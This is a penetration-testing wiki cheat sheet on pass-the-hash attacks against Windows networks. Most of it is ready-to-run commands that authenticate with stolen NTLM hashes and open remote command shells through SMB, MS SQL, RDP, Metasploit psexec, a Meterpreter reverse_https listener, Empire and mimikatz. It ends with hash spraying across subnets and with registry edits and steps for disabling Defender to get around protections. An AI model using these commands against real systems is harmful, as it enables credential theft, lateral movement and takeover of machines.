PTH: Pass the hash

From pentestwiki.org

Requirement:

SMB connections over ports 139/445 to a writeable share (e.g. C$, admin$)

Linux

SMB

root #pth-winexe -U <DOMAIN>/administrator%<NT HASH>:<NTLM HASH> //$IP cmd
root #crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP
root #python wmiexec.py -hashes :$HASH [email protected]$HOST


MS SQL

root #pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty


RDP

root #xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389


Metasploit

msf>use exploit/windows/smb/psexec


Crackmapexec + Meterpreter

First, start meterpreter listener:

msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_https
msf>set LHOST $LOCALIP
msf>set exitonsession false
msf>exploit -j


root #crackmapexec $IP -u administrator -p  $PASS -M metinject –o LHOST=$LOCALIP LPORT=444


Crackmapexec + Empire

root #python empire --rest --user empireadmin --pass Password123!


Edit ~/.cme/cme.conf:

[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
root #crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test


References:

Windows

For windows use mimikatz or lmpacket wmiexec

PTH with mimikatz:

C:>mimikatz.exe
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH


That should open a cmd.exe on the target machine.

Check hashes against network

root #medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
root #crackmapexec $IP/24 -u Administrator -H $HASH


2018 update

Problems with/Defence systems: UAC

SMB signing required when STATUS_ACCESS_DENIED
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0


WDigest Authentication
"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"

“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy” = 1  


Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this. You wouldn't even be able to pass the Administrator hash. You would need to turn off Windows Defender first.

Additionally, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System, and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.